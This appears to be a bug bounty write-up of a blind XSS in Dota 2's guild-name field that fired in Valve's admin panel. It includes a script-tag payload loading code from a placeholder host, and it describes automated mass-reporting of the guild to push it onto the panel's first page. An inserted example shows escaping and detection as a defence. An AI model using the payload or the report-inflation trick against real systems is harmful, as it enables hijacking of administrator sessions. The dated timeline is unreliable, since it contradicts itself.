The finding started when DOTA 2 announced a new feature for Battle Pass owners: being able to create a guild in the game. The update was around October 2020.
Guild Updates
We reintroduced Guilds during the Battle Pass, and we were happy to see how many players participated in Guilds and shared their feedback with us. We are keeping the existing Guilds, but many of the rewards received only worked in the context of the Battle Pass. We’ve redesigned those features so that you can enjoy playing with your guild all the time.
- source: https://www.dota2.com/newsentry/3066366095799664170
Because I was an active player of the game and also a bug bounty hunter, the idea just popped into my head to create a guild with a blind XSS payload as its name, without even thinking that the payload would be executed somewhere on Valve's systems.
My first thought was wrong: the exploit was executed on the Dota 2 administration panel, which is a web application hosted on dota2.com, which made me excited 🙀🙀🙀.
This is what the admin panel looks like. Rather than trying to escalate my privileges with the JavaScript execution I had, I immediately reported what I found to the https://hackerone.com/valve team. But I saw that the admin panel manages all the information of the game, like the IP addresses of the current in-game rooms; I could possibly ban a player there; pro player information is also stored there, etc. It is almost everything: custom games and whatever else.
After my investigation of the vulnerability, my conclusion is that the more guilds are registered in the system, the harder it is for our exploit to be viewed by the staff logged in to the administrator panel, because the guild table list was sorted by the number of reports the guild received. So to reproduce it a second time I used the steps below:
- Create a guild with a blind XSS payload as the name:
'"><script src=//domain></script>
- Report the guild name multiple times, until you feel the report amount is enough to make our guild listed on the first page.
- Profit!
alert(1)
There are 3 forms of report a guild can get: report guild name, report guild logo, and report guild tag. All of the report amounts are combined into total_reports, which is used as the sort value when the datatable is loaded in the application.
I automated this process of logging in to the game and reporting my guild repeatedly to get the number of total_reports I needed to get my guild on the first page of the datatable, since the table is configured to show only 50 rows per page. Getting there was not hard, since I was testing when the feature had just been released a couple of days earlier.
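As an added example (not code from the original writeup or from Valve), here is how the admin panel could render guild names without letting a name like the payload above execute: escape on output, keep the total_reports sort the post describes, and flag names containing markup for moderator review. The guild records, the escaping helper and the field names are assumptions of mine.

```javascript
// Added example: render untrusted guild names into an admin guild table
// as text, never as markup. Guild data and field names are constructed.

// Escape the five HTML-significant characters so the value is inert
// whether it lands in element content or in a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  })[ch]);
}

// Detection, independent of safe rendering: a guild name that contains
// tags, a javascript: URL or an on*= handler deserves a moderator's look.
function looksLikeMarkup(name) {
  return /<|>|javascript:|on\w+\s*=/i.test(name);
}

// Build table rows the way the writeup says the panel does: sorted by
// total_reports descending, so the most-reported guilds hit page one.
function renderGuildRows(guilds) {
  return [...guilds]
    .sort((a, b) => b.total_reports - a.total_reports)
    .map((g) =>
      `<tr><td>${escapeHtml(g.name)}</td><td>${escapeHtml(g.tag)}</td>` +
      `<td>${Number(g.total_reports)}</td></tr>`)
    .join('');
}

// Constructed sample: one ordinary guild and one named with the payload
// quoted in the writeup, heavily reported so it sorts to the top.
const sampleGuilds = [
  { name: 'Radiant Rangers', tag: 'RR', total_reports: 2 },
  { name: '\'"><script src=//domain></script>', tag: 'XSS', total_reports: 12 },
];
```

With escaping applied the payload still sorts to the first page, but the browser receives `&lt;script ...&gt;` as text and nothing runs.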
Key Takeaways
- Keep in mind that your input might end up anywhere, even where you do not expect; we never know ¯\_(ツ)_/¯.
That is all for this writeup folks, see you on the next writeup.
Jun 12, 2020: Reported
Jun 12, 2020: Severity Changed Crit -> High (I don’t get it actually)
Jun 16, 2020: Triaged
Sept 8, 2020: Severity Changed High -> Med (Based on all the information and actions that I can do there, this is just disappointing 😪)
Sept 8, 2020: Rewarded 750 USD + 150 USD Bonus
Proof(UNDISCLOSED yet): https://hackerone.com/reports/896281
My H1 Profile: https://hackerone.com/abdilahrf_